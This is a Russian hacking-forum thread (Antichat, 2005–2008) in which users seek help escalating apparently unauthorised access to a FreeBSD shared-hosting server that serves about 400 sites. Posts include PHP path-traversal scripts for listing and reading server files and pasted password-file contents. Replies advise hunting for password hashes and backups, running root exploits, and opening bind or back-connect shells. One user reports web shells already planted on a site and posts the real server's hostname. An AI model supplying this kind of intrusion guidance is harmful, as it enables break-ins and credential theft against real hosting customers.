Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   *nix (https://forum.antichat.xyz/forumdisplay.php?f=43)
-   -   Посоветуйте, что можно сделать на сервере FreeBSD, если... (https://forum.antichat.xyz/showthread.php?t=8410)

Mefisto 29.07.2005 19:44
Посоветуйте, что можно сделать на сервере FreeBSD, если...
 
Ребята, привет. У меня возник вопросик, я столкнулся с одним сервером на нём стоит FreeBSD, у меня есть доступ к папка вот они
Код:
.snap
bin
boot
dev
etc
lib
libexec
mnt
proc
rescue
root
sbin
tmp
usr
var
sys
.cshrc
.profile
COPYRIGHT
home
entropy
nonexistent
scripts
lost+found
backup
.contactemail
И чтение файлов, но не всех (на запись не проверял) Посоветуйте, что можно сделать на нём висит около 400 сайтов. Поделюсь если поможете.

Zadoxlik 29.07.2005 20:08
etc/shadow глянь на всяк пожарный

А вообще какие у тебя права, подробней о том какая версия и вообще так тебе думаю никто ничего не скажет. Просмотреть содержимое некоторых этих каталогов можно даже на некоторых бесплатных хостингах

Mefisto 29.07.2005 20:09
вот, для чтения папок я использую
Код:
<?php
if ($handle = opendir('../../../../'.$tmp)) {
    while (false !== ($file = readdir($handle))) {
        if ($file != "." && $file != "..") {
            echo $file;
        }
    }
    closedir($handle);
}
?>
А для чтения
Код:
<?
  $file=file('../../../../'.$sh);  $strings="5000
for($i=0;$i<$strings;$i++)
  {
  $string.=$file[$i];
  }

echo "$string\n";
  ?>

Вот у меня вопрос как записывать...

Mefisto 29.07.2005 20:12
нет такой... вот что в etc
Код:
bluetooth
mail
mtree
pam.d
periodic
gnats
isdn
rc.d
ntp
ssh
ssl
ppp
skel
defaults
group
hosts
hosts.allow
hosts.equiv
hosts.lpd
login.access
login.conf
mac.conf
motd
netconfig
network.subr
wwwacct.conf
relayhostsusers
networks
newsyslog.conf
pf.conf
pf.os
phones
profile
protocols
rc.firewall
rc.firewall6
rc.sendmail
rc.shutdown
rc.subr
remote
rpc
services
shells
sysctl.conf
syslog.conf
usbd.conf
ttys
manpath.config
mail.rc
locate.rc
login.conf.db
netstart
pccard_ether
spwd.db
rc.suspend
rc.resume
master.passwd
nsmb.conf
opieaccess
passwd
termcap
rmt
pwd.db
aliases
dumpdates
make.conf
resolv.conf
fstab
rc.conf.local
rc.firewall.local
nsswitch.conf
host.conf
opiekeys
wall_cmos_clock
localtime
login.conf.orig
sysctl.conf.orig
manpath.config.bak
amd.map
apmd.conf
auth.conf
crontab
csh.cshrc
csh.login
csh.logout
devd.conf
devfs.conf
dhclient.conf
disktab
fbtab
rc
ftpusers
gettytab
init.d
proftpd
rc.conf
localdomains
exim.conf.dist
periodic.conf.local
ports.ignore
inetd.conf
chkserv.d
secondarymx
ipaddrpool-
eximrejects
vmail
trueuserdomains
trueuserowners
demousers
demodomains
interchangedisable
userdomains
ips
make.conf,v
passwd,v
domainips
pure-ftpd
wwwacct.conf.shadow
localaliases
exim.conf.mailman2.dist
exim.conf.mailman2.exiscan.dist
antivirus.exim
exim.pl
exim.conf
exim.key
exim.crt
exim.pl.local
exim
exim.conf.buildtest
namedb
binddisable
newsyslog.conf.orig
relayhosts
syslog.conf.orig
X11
.whostmgrft
cpupdate.conf
name
Я всё просмотрел...

Mefisto 29.07.2005 20:24
Да не флудите, помогите лучше =) Я могу файлы читать на серваке что значит


# $FreeBSD: src/etc/master.passwd,v 1.39 2004/08/01 21:33:47 markm Exp $
#
root:*:0:0:Charlie &:/root:/bin/csh
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin

и вот еще

head 1.1383;
access;
symbols;
locks
root:1.1383; strict;

tester2005 29.07.2005 21:03
Mefisto:

Во первых, где ты видишь, что тут выясняют отношения =) ?

Во вторых, прежде чем спрашивать, почитай ФАКи или книжки по пользованию nix подобными системами..сможешь найти ответы на многие вопросы, и научишься чему то новому.
Для того чтобы писать в файлы, у тебя должны быть права для записи, почитай маленькую статью от nerezus'a на этом форуме, там всё описано простым языком...
http://forum.antichat.ru/thread8185.html

И тебе совет, если ты незнаешь в чем предназначение определённых файлов, то не лезь и не пытайса что-то сделать с ними, не утруждай жизнь сис-админу, у него седня праздник =)
Вот почитай немного, вник в смысл, и иследуй...;)

GoRiLLa 30.07.2005 01:26
http://freebsd.i1.ru/books.html#rus-books

nerezus 30.07.2005 07:36
FreeBSD. Администрирование: искусство достижения равновесия [19.53mb]
[ http://ruinst.net.ru/books/FreeBSD.pdf ]
Пароль на архив: WarezOk.Ru

Z][ANSWER 30.07.2005 11:08
Цитата:
Сообщение от Mefisto
# $FreeBSD: src/etc/master.passwd,v 1.39 2004/08/01 21:33:47 markm Exp $
#
root:*:0:0:Charlie &:/root:/bin/csh
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin

и вот еще

head 1.1383;
access;
symbols;
locks
root:1.1383; strict;
Это значит что пасы храняться в master.passwd, где и должны быть во Фре, а shadow это в Линуксе...

eugrus 04.08.2005 22:12
Цитата:
И чтение файлов, но не всех
ну и что?
корневую папку может читать вообще любой пользователь, как и содержимое большинства файлов - ни чего тебе они не дадут, если админ хоть немного знает то, чем занимается

Ни чего ты не сделаешь. Тем более, если так ставишь вопрос.

KEZ 07.08.2005 17:55
А про права ненадо писать???? Ты nobody ?
тупость...........>:[

Цитата:
папку password
ДА? Тоесть у тебя там папка, и в ней хеш? Интересно как он туда попал. Я слышал что данные храняться В ФАЙЛАХ А НЕ В ПАПКАХ... Может ты имел ввиду файл passwd =)))

FluffY 12.04.2008 06:48
А через что можно посмотреть pwd.db ? Нужен ли он вообще, т.к. хеши хранятся помоему в spwd.db, а он на чтение закрыт. Что можно сделать?

$n@ke 14.04.2008 14:38
Цитата:
А через что можно посмотреть pwd.db
блокнотом, vi, etc..

Цитата:
Нужен ли он вообще, т.к. хеши хранятся помоему в spwd.db, а он на чтение закрыт. Что можно сделать?
нужен. для восстановления поврежденного файла паролей(хешей).
сделать можно следуещее: прочитать содержимое /etc/shadow (/etc/master.passwd или /etc/security/passwd, /etc/samba/*) , если не получиться - поискать конфиги, бекапы, может в них пасс подходящий к руту.ИЛИ попробовать порутать сплойтом. если нет, пойти с друзьями(девушкой) погулять, отдохнуть и забыть(забить) на это.

thats all.

FluffY 15.04.2008 14:01
хм... а можно подробнее про сплойты? Другие варианты не катят.
система:
Код:
Server: Apache/1.3.39 (Unix) PHP/4.4.7 with Suhosin-Patch mod_perl/1.29 mod_ssl/2.8.30 OpenSSL/0.9.7e-p1
Ах да, ещё вопрос... на сайте весит два шелла, античат и р57, а ни один не хочет заливать фалы на сервер, в чём проблемма?

zythar 15.04.2008 14:32
нет прав на запись в директорию наверное. или, что мало вероятно, не хватает места

насчет сплойтов. посмари на milw0rm.com

FluffY 15.04.2008 15:13
Спасибо! Но чё за фигня, у меня есть доступ к фтп, какой шелл юзать, или как права поднять?

zythar 15.04.2008 15:18
юзай шелл ачата. а права поднимай с помощью сплойтов, если таковые имеються конечно

зы.

Цитата:
Сообщение от Журнал ][акер
бастионы фряхи не падут просто так, даже если админ лох

$n@ke 16.04.2008 11:35
короче, мля, напишы версию БСД и год сборки. полностью строку uname!
попробуй пробиндить порт или бекконект,если не получится, тебе, думаю, там нечего ловить =\

FluffY 16.04.2008 20:16
хе хе вот пожалуйста
Код HTML:
OS: FreeBSD ns2.leonar.ru 6.2-RELEASE-p8 FreeBSD 6.2-RELEASE-p8 #0: Wed Jan 16 21:13:56 MSK 2008 sysadmin@ns2.leonar.ru:/usr/obj/usr/src/sys/WEBHST i386

TrUnk_ 17.04.2008 10:18
Проверь "/backup" - если есть доступ на чтение к бэкапам , копируешь себе архив с содержимым "/etc" далее в master.passwd ищещь юзера у которого есть доступ к ssh.. Думаю, что врятли такое возможно, надейся на кривые руки админа, в реале встечал с открытыми дампами пару серверов только на linux.

.:KeepeR:. 17.04.2008 10:24
Для FreeBSD 6.2 видел гдето сплоит для повышения прав до рута.... Юзай гугл, под эту версию есть сплойт.....
PS ищи чтото по теме временных паролей (сплоит использует багу там какуето)

procedure 18.04.2008 02:26
Цитата:
Сообщение от .:KeepeR:.
Для FreeBSD 6.2 видел гдето сплоит для повышения прав до рута.... Юзай гугл, под эту версию есть сплойт.....
PS ищи чтото по теме временных паролей (сплоит использует багу там какуето)
во FreeBSD, права до рута может повысить только член групы wheel. Тут нужно значала до wheel подняться.

zythar 18.04.2008 14:17
ну вот (*
я же говорил. фряха, моя любимая фряха, просто так не сдастся в руки кульхацкеров (*
лучше займись чем нибудь другим (*


Время: 17:20